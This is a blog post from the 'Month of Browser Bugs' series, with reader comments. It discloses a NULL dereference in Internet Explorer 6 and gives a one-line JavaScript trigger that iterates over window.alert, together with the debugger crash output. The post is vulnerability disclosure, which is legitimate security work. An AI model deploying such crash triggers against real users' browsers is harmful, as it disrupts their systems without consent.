MoBB #25: Native Function Iterator
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. A NULL reference can be triggered by using javascript to iterate over a native function.
for (var i in window.alert) { var a = 1; }
Demonstration
eax=00000000 ebx=ffffffff ecx=0013b3f0
edx=0013b3f0 esi=00000000 edi=0013b488
eip=7dceef12 esp=0013b3d0 ebp=0013b3d4
mshtml!CPtrBagVTableAggregate::CIterator::Start+0x1e:
7dceef12 ff36 push dword ptr [esi] ds:0023:00000000=?????
This bug will be added to the OSVDB:
Microsoft IE Native Function Iteration NULL Dereference
posted by hdm @ 1:00 AM
3 comments
links to this post
3 Comments:
Very Nice find
Many commands are affected.
Im still curious of what will be the top of this mountain. Maybe something really really tricky amazing ? Who knows but The Great HD Moore
Can we get RSS feeds from this site?
IE7 - Beta3 is not affected
Version 7.0.5450.4
Post a Comment
Links to this post:
Create a Link
<< Home